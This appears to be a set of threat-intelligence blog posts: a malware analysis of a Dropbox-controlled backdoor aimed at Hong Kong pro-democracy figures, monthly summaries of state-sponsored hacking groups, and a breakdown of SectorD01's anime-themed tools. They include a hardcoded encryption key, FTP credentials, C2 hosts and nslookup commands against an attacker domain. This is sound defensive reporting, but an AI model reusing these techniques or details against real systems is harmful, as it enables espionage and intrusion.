Threat Actor Targeting Hong Kong Pro-Democracy Figures

Introduction

At the end of October, a person deeply involved in the pro-democracy side of the Hong Kong protests received a spear phishing email from someone claiming to be a law student at a top foreign university, requesting for feedback on his supposed thesis which includes recommendations on how to end the Hong Kong unrest. The email contained a link to a Google drive ZIP file.

The contents of FYI.zip downloaded from the Google Drive link

The ZIP archive contained three files – an August 2019 policy brief downloaded from Freedom House regarding the Democratic Crisis in Hong Kong, a September 2019 Hong Kong report downloaded from Human Rights First, and a supposed RTF file from the Nikkei Asian Review.

The third file masquerading as a Nikkei Asian Review document is actually a LNK shortcut file which had a double extension. When LNK files are viewed through archiving software, the double extension “.rtf.lnk” will be shown correctly. If the file was extracted and viewed through the Windows Explorer, however, the operating system always hides the LNK extension by default.

Analysis of the LNK file shows running it will execute msiexec.exe to download and run a remote MSI file

The LNK file is actually a shortcut to the Windows utility msiexec.exe, which can be used as a LOLBin to remotely download and run MSI files which have the PNG extension. In this case, the MSI file is remotely downloaded from a GitHub repository and account which was created on October 10.

A snapshot of the GitHub repository on October 29

siHost64

The MSI file, “siHost64.png”, was created using a registered or cracked EXEMSI program. Running it will drop and run “siHost64.exe” in the %APPDATA% folder. This executable is a PyInstaller executable which has over a thousand files inside it, but the main important file is the compiled python script “siHost64”.

Unpacking the PyInstaller executable shows the real files, some of which cannot be seen when performing dynamic analysis

By restoring the first eight missing bytes of “siHost64” which is typically required for such PyInstaller files, we are then able to decompile the compiled python script and analyze the functionality of this malware:

  • Use the Python requests library to call the DropBox API which connects to DropBox and uses it as a HTTPS C2 server
  • Use the system proxy for communications if any
  • Add itself to the registry AutoRun location HKCU\Software\Microsoft\Windows\CurrentVersion\Run with the registry name “siHost64”. On October 31, the new version of the malware changed the registry name used to “Dropbox Update Setup”.
  • Perform AES encryption with CBC mode on uploaded files with the key “ApmcJue1570368JnxBdGetr*^#ajLsOw” and a random salt
  • Check in to the C2 server by creating an encrypted file containing the operating system version and architecture, date, computer name, and logged in user
  • Check for files from the C2 server which contain encrypted arbitrary commands to be run, execute that command, and create a new encrypted file containing the results of the executed command.
Example of the malware using the Dropbox API to check in

Based on the check in information from infected machines, it appears that there is a single infected Hong Kong victim of interest to this threat actor connecting to the Dropbox app besides the target we described at the start. The files exfiltrated from this victim appeared to be personal documents related to the victim traveling to the United States, business forms, and Christian hymns.

Besides those exfiltrated documents, the C2 server also appeared to host their next stage malware such as two files named “GetCurrentRollback.exe” and “GetCurrentDeploy.dll”. “GetCurrentRollback.exe” is a signed Microsoft executable which seems to be for upgrading the previous Windows operating system version to Windows 10, and “GetCurrentDeploy.dll” likely being the name of the DLL which is side loaded. The first version of “GetCurrentRollback.exe” we could find was since 2016 and the latest in 2019 November, which means all version might be exploitable by DLL Sideloading at first glance.

A version of GetCurrentRollback.exe signed on November 13, 2019 is still vulnerable to DLL Sideloading

Conclusion

Based on the victim profile and the exfiltrated files, it appears one of the intelligence requirements of the threat actor is to monitor people with relations to the Hong Kong protests, targeting either them or the people around them. There are multiple possibilities for this requirements, with the most likely being to understand the inner thoughts of pro-democracy movement, or to support or undermine the movement behind the scenes.

Using Dropbox and other legitimate services such as Google Drive and GitHub
throughout the attack life cycle is not a new concept for threat actors, allowing them to easily bypass network detection. To counter this threat, enterprises or teams within enterprises nowadays block or detect such Shadow IT services if they are not in official use, but individual or non-enterprise users which may be targeted by state sponsored threat actors rarely have this luxury.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these and other related malware.

Initial Access

T1192 Spearphishing Link

Execution

T1204 User Execution
T1218 Signed Binary Proxy Execution
T1064 Scripting

Persistence

T1060 Registry Run Keys / Startup Folder

Defense Evasion

T1140 Deobfuscate/Decode Files or Information
T1036 Masquerading
T1112 Modify Registry
T1027 Obfuscated Files or Information
T1218 Signed Binary Proxy Execution
T1102 Web Service

Discovery

T1083 File and Directory Discovery
T1082 System Information Discovery
T1033 System Owner/User Discovery
T1124 System Time Discovery

Collection

T1005 Data from Local System

Command and Control

T1043 Commonly Used Port
T1132 Data Encoding
T1071 Standard Application Layer Protocol
T1032 Standard Cryptographic Protocol
T1102 Web Service

Exfiltration

T1022 Data Encrypted
T1041 Exfiltration Over Command and Control Channel

Monthly Threat Actor Group Intelligence Report, September 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from August 21 to September 20, 2019.

1. SectorA Activity Features

A total of three hacking groups, SectorA01, SectorA02, and SectorA07, were found among SectorA hacking groups this September.

The parallel requirements of the hacking activities of SectorA hacking groups, which continues to date, is to both collect high-quality information related to government activities such as political and diplomatic activities related to South Korea or related to SectorA relief organizations, and to illegally profit from crimes around the world. The purpose of this hacking has been continued for a long time, and for this strategic hacking purpose, it is expected to continue without change for the time being.

The hacking activities of the SectorA01, SectorA05 and SectorA07 groups discovered in September were related to collecting high-level information such as political and diplomatic activities related to South Korea.

SectorA01 group activity was found in South Korea, Germany, the United States, China, and Austria, and used malware in the form of files of Hangul software files, which is widely used by South Korean government agencies.

SectorA05 group activity was found in United States, South Korea, Peru, Belgium, France, China, Japan, the United Kingdom, Slovakia, Russia and Poland. The hacking technique used by the group was spear phishing emails to deliver malware in the form of Microsoft Word files to the target of attack. The lure document had a topic related to SectorA’s economic sanctions, nuclear development, and submarines.

SectorA07 group activity was found in South Korea, Italy, Vietnam, Japan, and Brazil. During that time, the attacker used a Windows executable file with a file name associated with a MOU contract with the Department of Defense. The file was disguised using the icon of Microsoft Word.

2. SectorB Activity Features

A total of eight hacking groups, SectorB01, SectorB03, SectorB09, SectorB11, SectorB14, SectorB19, SectorB20, and SectorB21, were found among SectorB hacking groups this September.

The hacking activities of the SectorB groups discovered to date have been found in Southeast Asia (including Thailand, Singapore, Indonesia, Philippines, Vietnam, Malaysia and India), the Middle East (including Turkey), East Asia (including Taiwan, Macau, Hong Kong, Japan and South Korea), North America (including the United States), and Europe (including the United Kingdom and Russia). In addition, hacking activity was discovered in the Uyghur region, which we believe was targeted for political purposes.

The SectorB hacking groups use spear phishing, which uses document files that exploit N-day vulnerabilities in Microsoft Office as attachments. This method of intrusion is common for them when targeting developing countries such as Southeast Asia.

In addition, the SectorB21 group performed hacking activities using Android malware to steal high-level information from smartphones of specific people in the Uyghur region.

Since the hacking activities of the SectorB group discovered in September are mostly concentrated in Southeast Asia, it appears to be closely related to the political and diplomatic activities of the SectorB government. Thus, the hacking activity of SectorB group is expected to continue especially in Southeast Asia and Europe.

3. SectorC Activity Features

A total of two hacking groups, SectorC01 and SectorC08, were found among SectorC hacking groups this September.

SectorC01 group activity was found in Europe and North America (including Ukraine, Canada, Belgium and the United Kingdom), while SectorC08 group activity was found in Ukraine, China, the United States, South Korea and Brazil. The SectorC08 group used to hack only in Europe in the past, but this is the first time that hacking activity has been found in East Asia (including China and South Korea), and additional analysis of their purpose is required. Although the SectorC groups, where hacking activity was found, use different hacking techniques, their spear phishing emails display common characteristics.

The SectorC01 group attaches Microsoft Word document malware to spear phishing emails and uses remote template injection techniques to deliver malware in Microsoft Word files containing macro scripts to their targets.

Similar to past hacking cases, the SectorC08 group maintains their traditional hacking approach using spear phishing emails with 7ZipSPX compressed files attached. However, we also confirmed that their hacking activity uses the remote template injection method, and the text content of the lure document used for the template injection was related to a specific conference.

The SectorC groups have many varied attack techniques because of their long history, and they are likely to continue a similar form of hacking in the future, as they continue to do so in line with the political objectives of the SectorC government.

4. SectorD Activity Features

A total of six hacking groups, SectorD01, SectorD02, SectorD05, SectorD10, SectorD14, and SectorD15 were found among SectorD hacking groups this September.

SectorD hacking groups targeted countries which are political rivals with the SectorD government. Their hacking activity discovered in September targeted countries located in the Middle East (including Morocco, Kuwait and the United Arab Emirates), and other hacking targets were the United States, the United Kingdom, Canada, India, the Netherlands, the Philippines, Azerbaijan, Kenya, China, Australia, Hong Kong and Switzerland.

The basic hacking techniques of the SectorD groups are similar to the previous cases – sending a Microsoft Word file with a malicious macro to the hacking target using an attachment in a spear phishing email. In addition to these hacking techniques, the SectorD05 group has launched attacks against researchers from the United States, Middle East, and France, focusing on academic research on SectorD, or performing phishing attacks against people targeting SectorD dissidents in the United States.

The SectorD10 group also uses links in phishing emails to direct targets to spoofing sites that are disguised as user login pages, and perform hacking activities to steal user credentials entered by targeted individuals.

The SectorD15 group conducted hacking activity aimed at gathering information on IT suppliers located in Saudi Arabia, which is likely to lead to a supply chain attack.

At the moment, diplomatic measures involving the SectorD government are underway in Western countries, mainly the United States. Such diplomatic activities could eventually lead to physical conflicts between countries, and it may be that these hacking activities are being used in cyberspace as preliminary reconnaissance.

5. SectorE Activity Features

A total of three hacking groups, SectorE02, SectorE03, and SectorE05 were found among SectorE hacking groups this September. The activities of the SectorE hacking groups were discovered in September in Europe (including Belgium, Portugal, United Kingdom, France and the Russia), Southeast Asia (including Singapore, Sri Lanka, Philippines, Thailand), East Asia (including Taiwan and China), North America (including United States and Canada), and Central Asia (including Pakistan and Turkmenistan).

SectorE hacking groups mainly conducted hacking activities targeting countries that are politically competitive with the SectorE government, but recently the range of geographical hacking activities of these groups is gradually widening.

The basic hacking techniques of the SectorE groups use attached documents in spear phishing emails, which could be a Microsoft Office document with a malicious macro functionality or previously known code execution vulnerabilities, or files from InPage software that are only frequently used in certain regions. They hosted malware in the form of Microsoft Word document that contain macro scripts on a specific domain. The document performs a remote template injection which would query the server to download the additional macro template from the attacker’s domain.

As the SectorE Group geographical radius of activity appears to be widening, they will likely continue to evolve and develop new hacking techniques. In past cases, whenever the geographic radius of hacking groups’ targets expanded, so did their hacking skills.

6. SectorF Activity Features

Hacking activity of the SectorF01 group was discovered this September, and the hacking activity was found in Asia (including Vietnam, China, Cambodia and Japan), and in Europe (including the United Kingdom and Germany).

The hacking activity found in September included a malware that has a similarity to a previously found malware, and is a RAR compressed file consisting of an executable file disguised as an Microsoft Word icon and a malicious DLL file, similar to the existing hacking technique. The SectorF01 group uses the DLL side loading technique to carry out the attack. When the executable file disguised as Microsoft Word program is executed, the DLL in the folder is loaded and executed.

As there have been many cases where their hacking activity has been discovered in regions including SectorF in the past, it is possible to consider hacking activities aimed at people who are opposed to political activities of the SectorF government. However, as hacking activities are also being conducted for the purpose of economic development in SectorF, additional analysis needs to be done while tracking their hacking activity areas and hacking targets.

6. SectorH Activity Features

Hacking activity of the SectorH01 group was discovered this September, but this is relatively infrequent unlike other government supported hacking groups.

SectorH01’s hacking activity was discovered in September, and their hacking activity was found in India, Kenya, Georgia, China, South Korea, Hong Kong, New Zealand and Canada. The SectorH01 group distributes malware in Microsoft Excel file formats containing macro scripts through spear phishing emails. The macro script executes JavaScript code hosted in Pastebin, which uses PowerShell to transfer the injector and DLL-type files to be injected into the infected system and then executes autorun registration for persistence.

The SecotorH01 group’s increased and broadening hacking activity highlight the dynamics of competition between SectorE and SectorH. It is important to pay close attention to the future competition between the two countries as to whether this increased hacking activity will affect the international situation in the future.

7. Cyber Crime Activity Features

Hacking activity of the SectorJ01, SectorJ02, SectorJ04, SectorJ05, and SectorJ09 group was discovered this September.

Unlike most other government-sponsored hacking groups, SectorJ groups seize information of financial value to make money in the real world, directly hack specific companies and organizations and run ransomware on their internal networks, or seize important industrial secrets in order to intimidate and extort victims.

SectorJ01 group activity was found in the United States, Russia, France, Bulgaria, China, United Kingdom, Poland, Germany, India, and Romania. The group used executables disguised as installers for Chrome or Firefox browsers, and used the NSIS (Nullsoft Scriptable Install System) to combine malware and normal browser installation files into one executable format.

SectorJ02 group activity was found in the United Kingdom and United States. They sent a spear phishing email to the target containing a link to download a JavaScript backdoor. When the malware is installed, it resides in memory and when the victim accesses an online payment page, skimming code would be injected into the HTML Document Object Model and collects payment information that the user types in.

SectorJ04 group activity was found in a wide range of locations – Europe (including Italy, Poland, Denmark, United Kingdom, Slovenia, Greece), East Asia (including South Korea, Japan), Middle East (including United Arab Emirates), Argentina, Philippines, Canada, India, Malaysia and the United States.

The group has been using spam emails with Office-themed Microsoft Excel or Word documents attached in the past for a while, installing malware on the infected system which transmits the information collected from the infected system to a specific server.

SectorJ05 group activity was found in the United Kingdom, Hong Kong, China, Germany, India, Netherlands, Sri Lanka, Belarus, the United States, and Russia. They primarily used malicious documents containing macro scripts, CHM files, or malicious attachment in the form of LNK shortcut files.

SectorJ09 group activitywas found in Italy. They launched an attack on e-commerce service providers, injecting JavaScript into the payment page of the hotel’s website using a particular e-commerce service to load the remote script. Only when accessing the page from a mobile device, a skimmer script is loaded to steal credit card information.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

SectorD01: When anime goes cyber

Multiple organizations in Kuwait have been targeted since 2018 by a threat actor we track as SectorD01, whose primary targets appear to be located in the Middle East but also observed by us to target North America, Europe, South Asia and East Asia in other campaigns. In this analysis we will briefly go through some of the tools used by this threat actor in the campaign which are named Sakabota, Diezen, Gon, Hisoka, Netero, and EYE, and explain how these tools are linked to each other and to other activity in the region.

Sakabota

When we looked at 21 samples of the tool named Sakabota, we noticed the file internal comments “Blade for not to killing” and the file’s icon which resembles a scar and has the internal name “Icon_kenshin”. “Kenshin” is the name of the main character with that scar from the Japanese anime “Rurouni Kenshin”, otherwise known as “Samurai X” to English viewers. His sword is named Sakabatō, which is a reverse-edge sword which does not kill, and this lines up with the file internal comments of “not to [sic] killing”.

The samples we looked at had the version numbers 1.4, 1.5, 1.6, 2.5, and 2.6. Some of its functions include using WMIC/PSEXEC/dsquery/Mimikatz/plink/RAR, FTP uploading to ftp://www[.]pasta58[.]com with credentials “administrator”/”Mono8&^Uj”, downloading files, taking screenshots, performing RDP, IP/port scanning across common services, dropping the svhost.exe agent / Shell.aspx web shell (see below), clearing traces of itself, and closing itself. The hardcoded C2 addresses are set as pasta58[.]com and 176[.]9[.]235[.]101, and hardcoded DNSCAT C2 address as 217[.]79[.]183[.]33.

Besides the functionality changes across versions, the threat actor also attached various resources to the malware. Different samples had different resources attached to them, and this was irrespective of the version codes.

NameDescription
dsqueryTrusted Microsoft command-line utility for querying Active Directory Services.
v5.2.3790.3959
kMost of the “k” resources we saw were empty, but there was one which contained a sort of cheat sheet of different commands which the attacker could use for many techniques such as password cracking, passing the hash, dumping passwords, using certutil, and using the other embedded resources.
Interestingly, in one section of the cheat sheet, there were URL examples of how to access a web shell which could possibly be a GET version of LittleFace. This web shell URL contained the domain of a Taiwanese university, suggesting the university may have been compromised in the past.
nircmd64-bit NirCmd command-line utility from NirSoft.
v2.81
plinkCommand-line PuTTY.
v0.62
PowerCat_DNS_smallA shortened version of the open-source powercat PowerShell utility.
rar64-bit command-line WinRAR.
v4.20
LocalTrusted Microsoft utility which has so far only been publicly reported to be used by TwoFace in 2017.
PSEXECSigned and trusted Sysinternals/Microsoft PsExec utility.
v2.2
This is an old version of PSEXEC which allows the attacker to bypass the graphical EULA using the “-accepteula” flag.
ShellCustom Shell.aspx web shell which uses md5 hashing to check the password given in the “id” parameter of the POST request.
There are some commonalities between this web shell and the IntrudingDivisor web shell used by TwoFace, but this web shell is more limited in functionality and is used for uploading files or executing commands via “cmd.exe /c”.
It is created under the \dayzen directory relative to Sakabota when the attacker clicks on the “Shell” button in Sakabota. Only four samples of Sakabota contained the embedded Shell.aspx.
svhostThe executable svhost.exe dropper for the PowerShell malware Unit 42 named CASHY200, which accesses the C2 firewallsupports[.]com. This dropper had not been previously linked to the Sakabota malware.
It is created under the \dayzen directory relative to Sakabota when the attacker clicks on the “Agent” button in Sakabota. Only one sample of Sakabota contained the embedded svhost.exe.
DiezenAnother backdoor with the picture of a samurai used by the attacker which connects to pasta58[.]com, the same C2 server as Sakabota.

Another interesting thing to note is that the Sakabota malware was made to work not only with the embedded resources above, but also with Mimikatz which we believe was not embedded due to the likelihood of Sakabota being detected more easily. All of these tools together bear a striking resemblance to the various tools uploaded to a TwoFace web shell in the past.

Sakabota in GUI mode contains a wrapper for Mimikatz, which is not embedded in the malware.

Diezen

Diezen is a simple backdoor which can be dropped by Sakabota which is set to connect to the same C2 address, pasta58[.]com, using a custom non-HTTP protocol over port 443 via the .NET TcpClient class primarily to execute attacker commands via “cmd.exe /c”. The samples we looked at had the version numbers 0.0.1, 0.5, and 0.6.

By the time Diezen reached version 0.6, it switched over to port 80 and added new functionality for file upload, download, taking screenshots, checking the user’s public IP via checkip[.]dyndns[.]org and checking if an alternative autostart location – the Start Menu – was available besides its normal usage of scheduled tasks. The feature of checking the user’s public IP was later carried over to the Hisoka malware as well, alongside implementing the previously unimplemented decryption and encryption routines, while the screenshot feature was carried over to the Gon malware.

Gon

Gon is the main character from the Japanese anime “Hunter × Hunter”. When looking at Gon and the other “Hunter × Hunter” themed malware, their code appears to have been originally branched out from the Sakabota malware. In Gon’s case, not only are there the embedded resources dsquery and plink, a large part of the non-GUI code is exactly the same and in fact still has remnants of “Sakabota” in one of its strings.

Just as the various versions of Sakabota have added functionality which were in its code but previously unimplemented, Gon has implemented some of Sakabota’s previously unimplemented code and also contains a password list containing slightly over 1000 passwords which are mainly variations around digits, the word “password”, and the word “kuwait”. These passswords are used for brute forcing from the tool.

EYE

EYE is the name of another simple tool we believe to be part of the attacker’s “Hunter × Hunter” themed toolset. The purpose of EYE is to log new processes created and to clear the attacker’s tracks when the attacker unexpectedly disconnects due to a new user logon. When looked at together with the other anime themed malware and the file icon, we believe the attacker thought of EYE as the scarlet eyes in “Hunter × Hunter”, giving the attacker additional capabilities when the attacker is emotionally agitated.

Ascii art from EYE using Japanese kaomoji. The square box ロ is actually the Japanese kana character “ro”.

In fact, this clearing of tracks automatically upon disconnection is not a capability unique to the EYE malware as the exact same function exists in Sakabota. It hooks onto the .NET event SystemEvents.SessionSwitch so that if the attacker gets disconnected unexpectedly due to a new user logon, it will close all processes made after EYE was opened, delete file and registry keys related to attacker activity – recent files accessed, both automatic and custom jump lists which were first introduced in Windows 7, remote desktop history, search terms, autocomplete, and start menu run history. It will then close and delete itself.

Hisoka and Netero

Hisoka and Netero are also two important characters in the Japanese anime “Hunter × Hunter”.

Running Hisoka 0.8 with the arguments “66” will create a “Help.txt” file in the same folder, and this file contains instructions of how to use and interact with Hisoka from both the victim and attacker’s machine. It also contains functionality to query Active Directories via LDAP, which is likely meant to take over the functionality of the dsquery utility embedded in Sakabota. Funnily enough, the function is contained in an “AI” class of Hisoka which is most certainly not AI, proving even threat actors have joined the hype.

Hisoka is able to communicate with the attacker’s C2 server using a proper HTTP request over port 80 (unlike Diezen, which had its custom protocol and would be easily detected over the network) and DNS over port 53.

For its HTTP C2, it uses the hardcoded user agent string “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36” from Chome version 73 which was released on March 12, 2019.

For its DNS C2, it has an unused feature to perform an nslookup.exe check against hisoka[.]<C2_Address> in order to check its status which may be useful to check against later versions we have not seen. Example commands for performing its status check are:

  • nslookup.exe -type=”A” hisoka[.]microsofte-update[.]com 8.8.8.8
  • nslookup.exe -type=”TXT” hisoka[.]microsofte-update[.]com 8.8.8.8
Hisoka v0.8

On the other hand, the Netero malware is a helper utility and loader built for Hisoka and in fact cannot function without it. Unlike Hisoka, the attacker does not interact with Netero via command-line arguments but has to interact via modifying an obfuscated “command” in the registry. The way Netero loads and encrypts/decrypts data from the registry is similar to Hisoka – various registry keys from HKCU\EUDC\313\hisoka_v2 (Hisoka uses HKCU\EUDC\313\hisoka) are loaded, XOR-ed with 0x53, then Base64 decoded.

The attacker commands are loaded from HKCU\EUDC\313\hisoka_v2\CM and checked every 1-4 seconds. All of the other configurations including the kind of C2 server to use are loaded in the same way and checked constantly, with the result of any command being returned in another registry key. In this way, the attacker becomes able to interact constantly with Netero purely via the registry and no longer requires a GUI or CLI. Since the interaction with the registry has to be XOR-ed and Base64 encoded for very command, it means the attacker is using another wrapper program instead for this interaction.

The attacker also added another C2 “engine” to the Netero malware’s functionality. While Hisoka could previously already communicate with its C2 server via DNS and HTTP, Netero is also able to communicate with the C2 server via EWS ([Microsoft] Exchange Web Services), interacting with Microsoft Exchange servers using saved drafts in a manner reminiscent to how it interacts with the attacker via the registry.

Netero shows Hisoka’s output as it is just a helper utility

Both Hisoka and Netero are stated to be “Compatible with Sakabota v3.4”, while later samples of Diezen was compatible with v2.0 and v2.1. While we did not find any version 3 or above samples of Sakabota, it shows that Sakabota is still in active development alongside the “Hunter × Hunter” themed malware and the end goal is likely for either Sakabota or Hisoka to act as the wrapper for all of the other malware which interacts via command-line / registry, similar to how Sakabota already acts as a wrapper for many other tools such as Mimikatz and PSEXEC.

Conclusion

Based on the attacker’s personal cheat sheet, the chunks of code dedicated to finding server software, and the internal web shell code, it is quite likely that one of the initial access routes used by the attacker is attacking organization web servers through SQL injection vulnerabilities for web shell upload, and organizations likely to be targeted should take note of this.

Also, since SectorD01 was first discovered in 2016, they already had a penchant for using DNS in their various malwares for their C2 communications even up till recently. One of the easy ways to detect this is to monitor the network for suspicious DNS traffic, although DNS over HTTPS may mask this in the future. It remains to be seen if the other teams of SectorD01 will take up EWS as a C2 protocol as well.

We believe Gon and the other “Hunter × Hunter” themed malware were branched off from Sakabota (and Diezen) to get around Sakabota’s large file size and eventually compartmentalize the attacker’s various tools into a sort of framework as their capabilities mature.

Indicators of Compromise (IoCs)

Sakabota

2D7FF8D3AEE31CD2F384D74E6B0F07ECDA2CEA860FB3210C9AFE66BC7CC6F90B
5B5F6869D8E7E5746CC9BEC58694E4E0049AEF0DCAC5DFD595322607BA10E1AE
7CFD75AB4822B489F74E83D3046536509C44B29B72B43125B0ECA1FE449B5953
8E18B28DC7351B0E7928B0F5373A6E987BA6D084D84BFD0B29E7F458CA5401E5
9A431838F2613454C5630A5F186F0AEE240DFC5723BD6E1B586BB4118CC3AAB7
40B18A1C06888F8E116B6DE21F70359B9763B8066C764542FF3816C118B7D482
47CA763DA840FDEE68B97E8D53CBC56B3F90E4D6532F0B1501B90175B8FCA24F
66E57D2909E37D39791BEE91EB9E8121AA48EA89EAE8A09275AE078E9DDA2F50
335E9EB0BB571CA81CC6829483F0B8D015627F8301373756D04D844CDE04918D
3314CC701F5C9030622DE055879141F6E8C23408029995BD7A88374008AA4390
761635C23F3C98A8D18E48C767FFF2B0EC321B58064B404EA1B2B4A555913296
A391C5B80A729CC661614F3E64D65CB136ECA9900A9025AEE3AF9A167B38F5C9
B9C56DA9E911DC85B06F8DC9D1A486663AF8F982511E1C3AD568E635E2323274
B73FACBF55053519B5DA29397CFD3BEEA519E9F1BD41C50B6C2F3F1B4ECA15A3
BF7A448EF2603CCE5488D97474C913BA14C9550D03CC5E387FE31EB416DC0259
CC21BC11D9AED226E9C511480E54BB1305CEA086AB0B5E310DE68228DEBDC80E
D0F57E566C6B457D6E97DC02266D67D81EF561FBA50A86E9F9FC889DC5167068
D80AEB4FB326AF0BF1179C4FCF2AD01CF98DDAB81F709E690BBD728C027064E9
DB1F460F624A4C13C3004899C5D0A4C3668BA99BB1E6BE7F594E965C637B6917
DF0F874219FFAC8038290EB4A39BA6686EDC35DE8913563F8DDC9644AD4BDE64
EA31E5AFEC3B94635E98473183EC420E9C3E6FD13B618DADB5B34BF5C257A5AA

Attacker Resources Embedded in Sakabota

CC73D71CC86D9336652A2073AB176B8E3394CCAB95B7B4897724C987656D9AC5
0D7FCD262DF1D8961F2A5A4EBE054A6EFBA42B4156EA64557E05C8F7D29667B5
B2FB0DA6832E554194B59C817922770AF13D474179A1C0381809676EF2709D24
FFE2E9B274B00EA967C96ECA9C177048C35DE75599488F1B8BE5AE1CCEBA00D9
054736B827E07D5E461B0A900AD54B0BCB58BDC23A5C607697A1E6C452B3570D

Legitimate/Gray Resources Embedded in Sakabota

4C8C4E574B9D1DC05257A5C17203570FF6384D031C6E6284FBC0020FE63B719E
5BFA034F7555A38E64C078AF71B4FF8C49511579FA826A87661940B7E9A6E333
04E5F50DD90D5B88B745EF108C06A3EF1E297018CB3FE8ACC80DD55250DFEE68
EA139458B4E88736A3D48E81569178FD5C11156990B6A90E2D35F41B1AD9BAC1
450EBD66BA67BB46BF18D122823FF07EF4A7B11AFE63B6F269AEC9236A1790CD
3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF

Diezen

054736B827E07D5E461B0A900AD54B0BCB58BDC23A5C607697A1E6C452B3570D
0EA5565C15303C56C69BBADEE462E9C63DBD6EE52F00F187E435AF224A48795B
19E3B10056E33FA7559DAF8D9A5104EBB313675A2B4DACA37BAB7DA1A49C2E0F
FF0BD8F8DEE90BA71A491F17B9FDA52C918EF9D3580D562029268A99B7410E19

“Hunter × Hunter” Themed Malware

84122B55E5552AF1752A00F1A268247FECA7E7DBEB4C4CD7B3F5A3005A19FE16
8391C571BFFB3CE538ACE4D8A3388B28EB486CCA5BDAB08AB7B568B4E8FC0EC8
892D5E8E763073648DFEBCFD4C89526989D909D6189826A974F17E2311DE8BC4
3996EFE9A3CF471A1F816287368FA0F99D2CDB95786530B0B61C7B9024FF717B

C2 Domains

pasta58[.]com
firewallsupports[.]com
microsofte-update[.]com

C2 IPs

217[.]79[.]183[.]33
176[.]9[.]235[.]101
213[.]202[.]217[.]31

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these and other related malware.

Initial Access

T1190 Exploit Public-Facing Application

Execution

T1059 Command-Line Interface
T1106 Execution through API
T1086 PowerShell
T1053 Scheduled Task
T1064 Scripting
T1204 User Execution
T1061 Graphical User Interface
T1047 Windows Management Instrumentation

Persistence

T1060 Registry Run Keys / Startup Folder
T1053 Scheduled Task
T1100 Web Shell
T1078 Valid Accounts

Privilege Escalation

T1100 Web Shell
T1053 Scheduled Task
T1078 Valid Accounts

Defense Evasion

T1140 Deobfuscate/Decode Files or Information
T1202 Indirect Command Execution
T1112 Modify Registry
T1064 Scripting
T1480 Execution Guardrails
T1107 File Deletion
T1070 Indicator Removal on Host
T1078 Valid Accounts

Credential Access

T1110 Brute Force
T1003 Credential Dumping

Discovery

T1087 Account Discovery
T1482 Domain Trust Discovery
T1010 Application Window Discovery
T1083 File and Directory Discovery
T1046 Network Service Scanning
T1135 Network Share Discovery
T1057 Process Discovery
T1012 Query Registry
T1018 Remote System Discovery
T1082 System Information Discovery
T1033 System Owner/User Discovery

Lateral Movement

T1210 Exploitation of Remote Services
T1075 Pass the Hash
T1076 Remote Desktop Protocol
T1105 Remote File Copy
T1021 Remote Services
T1051 Shared Webroot
T1077 Windows Admin Shares

Collection

T1113 Screen Capture
T1005 Data from Local System
T1039 Data from Network Shared Drive

Command and Control

T1043 Commonly Used Port
T1094 Custom Command and Control Protocol
T1105 Remote File Copy
T1132 Data Encoding
T1001 Data Obfuscation
T1008 Fallback Channels
T1071 Standard Application Layer Protocol

Exfiltration

T1041 Exfiltration Over Command and Control Channel
T1048 Exfiltration Over Alternative Protocol
T1022 Data Encrypted
T1002 Data Compressed

Monthly Threat Actor Group Intelligence Report, August 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from July 21 to August 20, 2019.

1. SectorA Activity Features

A total of four hacking groups, SectorA01, SectorA02, SectorA04 and SectorA07 were found among SectorA hacking groups this August. Two parallel requirements of SectorA hacking groups are collecting high-quality information related to South Korean political and diplomatic activities and to obtain illegal monetary benefit by targeting anywhere in the world.

SectorA01 group activity was found in South Korea, the Philippines, Argentina, Pakistan, United States and Nepal. SectorA02 group activity has been found in South Korea and the United States. SectorA4 group, which had not been found for a while, was found in South Korea, and malware was discovered using a digital signature issued by a Korean security company. Sector07 group activity was found in South Korea, Indonesia, United States, Russian Federation and Germany.

The activities of the four SectorA-related hacking groups discovered in August common use Spear Phishing as an attack vector. However, SectorA01 uses Hangul files (HWP) as attachments in South Korea, and only other SectorA02, SectorA04, and SectorA07 groups use Microsoft Word files containing macro function as an attachment to its Spear Phishing emails.

The SectorA02 group produces mobile malware designed to run on Android smartphones and uses it for hacking activities.

The SectorA groups aim to seize high-level information related to South Korea’s political, diplomatic and North Korean relief organizations. Due to large-scale economic sanctions surrounding SectorA, their hacking groups carry out hacking activities to steal financial information in other countries, including South Korea. These operations take place in parallel. and SectorA groups are expected to continue hacking with the purpose.

2. SectorB Activity Features

Among the SectorB groups, a total of five hacking groups, SectorB01, SectorB03, SectorB04, SectorB06 and SectorB07 group were found among SectorB hacking groups this August.

The hacking activity range of the SectorB01 group discovered so far has been the widest in the history of this hacking group. Their activity was found in Asia (including South Korea, Japan, Singapore, Vietnam, Malaysia, Hong Kong, Taiwan, Thailand, Myanmar, India), the Middle East (Turkey) and Africa (including South Africa), North America (including the United States and Canada) and Europe (including France, United Kingdom, Ireland, Germany, Switzerland, Netherlands, Italy, Czech republic, and Ukraine).

SectorB03 group activity was found in the United Arab Emirates, the United States, Japan and Taiwan.

SectorB04 group activity was found in Russian Federation, United States, United Kingdom, Turkey, Spain, South Korea, Malaysia and Taiwan.

The SectorB06 group has been found in the Russian Federation and Belarus.

SectorB07 group has been found in South Korea, Germany, United States and India.

Most of the SectorB hacking groups use Spear Phishing with document files as attachments to exploit vulnerabilities in Microsoft Office.

SectorB group’s hacking activities discovered in August are mostly concentrated in Asia, Europe and North America, and this is closely linked to its activities to obtain information about its country’s diplomatic and economic information related to an ongoing trade war with the United States.

3. SectorC Activity Features

Among the SectorC groups, the activities of three hacking groups, SectorC02, SecotorC03 and SectorC08 were found among SectorC hacking groups this August.

The hacking activity of SectorC02 group has been found in Brazil, Georgia.

The hacking activity of SectorC03 group has been found in United States and United Kingdom.

